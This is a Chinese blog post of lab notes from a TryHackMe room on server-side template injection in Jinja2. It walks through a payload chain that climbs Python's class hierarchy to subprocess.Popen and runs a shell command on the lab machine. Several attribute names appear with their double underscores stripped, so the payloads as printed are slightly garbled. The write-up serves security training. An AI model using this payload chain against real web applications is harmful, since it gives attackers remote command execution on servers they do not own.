TryHackMe-SSTI基础

已于 2023-01-15 14:24:54 修改
阅读量190 收藏
点赞数
分类专栏: 我的网络安全之旅-TryHackMe 文章标签: 网络安全 安全 web安全
于 2022-12-22 10:36:24 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_54704239/article/details/128405500
版权

Server Side Template Injaction

SSTI-Payloads:

https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection

Jinja2、3

https://jinja.palletsprojects.com/en/3.0.x/templates/

attr(obj, name):
Get an attribute of an object. foo|attr("bar") works like foo.bar just that always an attribute is returned and items are not looked up.

制作概念验证 (Jinja2)

Python 允许我们使用 .class 调用当前类实例,我们可以在空字符串上调用它:

有效载荷:。http://MACHINE_IP:5000/profile/{{ ‘’.class }}

Python 中的类有一个名为 .mro 的属性,它允许我们爬上继承的对象树:

有效载荷:。http://MACHINE_IP:5000/profile/{{ ‘’.class.mro }}

由于我们想要根对象,我们可以访问第二个属性(第一个索引):

有效载荷:。http://MACHINE_IP:5000/profile/{{ ‘’.class.mro[1] }}

Python 中的对象有一个名为 .subclassess 的方法,它允许我们向下爬取对象树:

有效载荷:。http://MACHINE_IP:5000/profile/{{ ‘’.class.mro[1].subclasses() }}

有效载荷:。http://MACHINE_IP:5000/profile/{{ ‘’.class.mro[1].subclasses()[401] }}

上面的有效负载实质上调用子进程。Popen 方法,现在我们所要做的就是调用它(使用上面的代码进行语法)

有效载荷:。http://MACHINE_IP:5000/profile/{{ ‘’.class.mro[1].subclasses()[401](“whoami”, shell=True, stdout=-1).communicate() }}

Sugobet
关注
专栏目录
CTF题型 SSTI(1) Flask-SSTI-labs 通关 题记(1)
2401_84009626的博客
04-20 780
可以编码绕过 python解析器支持 hex ,unicode编码 (不建议用base64仅python2支持)建议用nssctf在线 https://www.nssctf.cn/problem/13 直接用。完全可以替换为 request.args.参数名(get方式)用[] 代替 . 其他方法 参考 获取属性的四种方法。尝试写静态文件 请先了解 flask 静态目录概念。以下题目我用简洁的payload 绕过。{{}} 等价于 {%print%}通过过滤器 | join 返回变量。通过 |attr()
TryHackMe-基本渗透测试
M1n9K1n9的博客
12-22 1092
这里的主要目标是尽可能多地学习。确保您使用OpenVPN配置文件连接到我们的网络。部署机器并连接到我们的网络查找计算机公开的服务按照上面这句话,我们先使用nmap简单扫一圈┌──(root💀kali)-[]└─#nmap-sS访问80端口的web,好像没东西,到8080端口看一下,有网页。
TryHackMe新手村
weixin_55154296的博客
04-17 7891
TryHackMe 最近在外网发现了一个在线黑客学习网站:TryHackMe ,缺点是好像需要一些上网技巧,而且全英,免费用户每天只能用一小时,付费(大概一个月6、70)无限制. 以下附上刚入门时的坑 在tutorial的第一个问题,问的是 Follow the steps in this task. What is the flag text shown on the website of the machine you started on this task? 意思我都读懂了,但是我填flag、c
HNCTF——web方向部分题解
m0_60715541的博客
11-01 1616
这是这次分享的题解的清单,主要是web的,等我啥时候有时间更新一波杂项的题解。
TryHackMe | Linux系统入侵
m0_63452153的博客
06-20 445
TryHackMe Network Security
TryHackMe-VulnNet_dotpy
M1n9K1n9的博客
01-17 991
是的,VulnNet Entertainment又回来了,现在以安全为重点。您再次被要求执行渗透测试,包括 Web 安全评估和 Linux 安全审核。难度:中等网络语言:python 这台机器的设计更具挑战性,但没有太复杂的东西。Web 应用程序不仅要求您找到易受攻击的端点,还需要绕过其安全保护。您应该注意网站为您提供的输出。整个机器都是以Python为中心的。注意:在浏览网页时,您可能会注意到域 vulnnet.com,但是,它不是实际的虚拟主机,您无需将其添加到主机列表中。
CTF-SSTI模板注入
2302_78903258的博客
07-22 1258
当前使用的一些框架,比如python的flask,php的tp,java的spring等一般都采用成熟的的MVC的模式,用户的输入先进入Controller控制器,然后根据请求类型和请求的指令发送给对应Model业务模型进行业务逻辑判断,数据库存取,最后把结果返回给View视图层,经过模板渲染展示给用户。
CTF-SSTI(持续更新)
m0_74317362的博客
07-27 376
SSTI
flask-ssti 模板注入复现
YouthBelief的博客
11-22 1109
所有文章,仅供安全研究与学习之用,后果自负! flask-ssti 模板注入复现flask-ssti 模板注入复现0x01 漏洞描述0x02 影响范围0x03 漏洞复现1 手工验证漏洞是否存在2.执行命令tplmap工具验证0x04 漏洞修复 flask-ssti 模板注入复现 0x01 漏洞描述 Flask 是一个 web 框架。也就是说 Flask 为你提供工具,库和技术来允许你构建一个 web 应用程序。这个 wdb 应用程序可以使一些 web 页面、博客、wiki、基于 web 的日历应用或商业网站
CTF题型 SSTI(1) Flask-SSTI-labs 通关 题记
2401_84009698的博客
04-20 993
外链图片转存中…(img-6fV9ce6x-1713552193682)]
vulhub学习(3) flask-ssti 漏洞复现
yukinorong的博客
06-24 2219
环境准备 漏洞环境选择vulhub , 如上述配置 进入flask/ssti 打开docker环境 这里可以看见环境启动成功 由于我的vulhub配置在虚拟机上,不能直接用127访问。 打开命令行 ifconfig,找到ip 192.x docker 启动环境会另外配置端口,利用docker ps查询。发现是8000 漏洞原理 利用浏览器访问可以看见页面 查看源码 可以看到核心语句为 t = Template("hello " + name) 此处,函数利用get获取参数进入template
Flask(Jinja2)--ssti(服务端模板注入漏洞)
flag_zhang的博客
03-28 389
参考文章:https://www.jianshu.com/p/a1d6ae580add 基础知识 什么是Flask? Flask 是一个使用 Python 编写的轻量级 Web 应用框架。其 WSGI 工具箱采用 Werkzeug ,模板引擎则使用 Jinja2 。Flask 为你提供工具,库和技术来允许你构建一个 web 应用程序。这个 web 应用程序可以是一些 web 页面、博客、wiki、基于 web 的日历应用或商业网站。 from flask import Flask app = Flask(.
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8465
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
小琳AI课堂:确保大语言模型安全的八大策略--从数据隐私到用户教育
wx740851326的博客
09-15 455
首先,我们要明白,保证大语言模型的安全,需要从多个方面入手,确保模型在技术、法律、伦理和社会层面都得到妥善处理。大家好,这里是小琳AI课堂。今天我们深入探讨如何保证大语言模型的安全,这可是关系到我们每个人哦!
WAAP解决方案:守护数字时代的安全盾牌
最新发布
dexunyun的博客
09-18 941
WAAP,即Web应用程序与API保护,是一种综合性的多层防护解决方案。它旨在通过强化认证、加密机制以及集成多种安全防护手段,如API安全Web攻击防护、全站隔离、漏洞扫描和流量清洗等,为企业的Web应用程序和API提供全方位的安全保障。WAAP不仅能够有效防御常见的网络攻击,如跨站脚本(XSS)、跨站请求伪造(CSRF)和SQL注入等,还能应对更为复杂的DDoS攻击和API接口滥用等高级威胁。
深入剖析Docker容器安全:挑战与应对策略
qq_39241682的博客
09-18 1003
Docker容器通过操作系统级虚拟化实现应用的隔离,这种方式与传统虚拟机不同,容器共享宿主机的内核。这种架构虽然简化了部署和资源利用,但也引入了安全隐患,特别是当容器与宿主机共享内核时,容器内部的漏洞可能会影响到整个系统。
【农信网-注册/登录安全分析报告】
09-16 1529
北京农信互联科技集团有限公司是一家农业互联网高科技企业,以“用互联网改变农业”为使命,致力于构建最有影响力的农业数智生态平台,推动中国农业数字化转型升级。作为农业互联网领域的“独角兽”企业, 技术实力也应该不错,但采用的还是老一代的图形验证码已经落伍了, 用户体验一般,容易被破解, 一旦被国际黑客发起攻击,将会对老百姓形成骚扰,影响声誉。很多人在短信服务刚开始建设的阶段,可能不会在安全方面考虑太多,理由有很多。比如:“需求这么赶,当然是先实现功能啊”,“业务量很小啦,系统就这么点人用,不怕的。
无限边界:现代整合安全如何保护云
网络研究观
09-15 1095
通过工具之间更有效的数据共享,整合的安全平台还应提供更紧密的安全集成以及更强的系统可视性(无论是在云端还是在本地),让您能够看到无限周界的边缘。
ssti-lab靶场通关
09-02
为了通关ssti-lab靶场,你可以按照以下步骤进行操作: 1. 首先,从上一个数据库中找到的password字典中获取到mssql的账户密码。 2. 使用这个账户密码进行mssql的暴力破解,以获得访问权限。 3. 一旦你获得了访问权限...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Sugobet

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值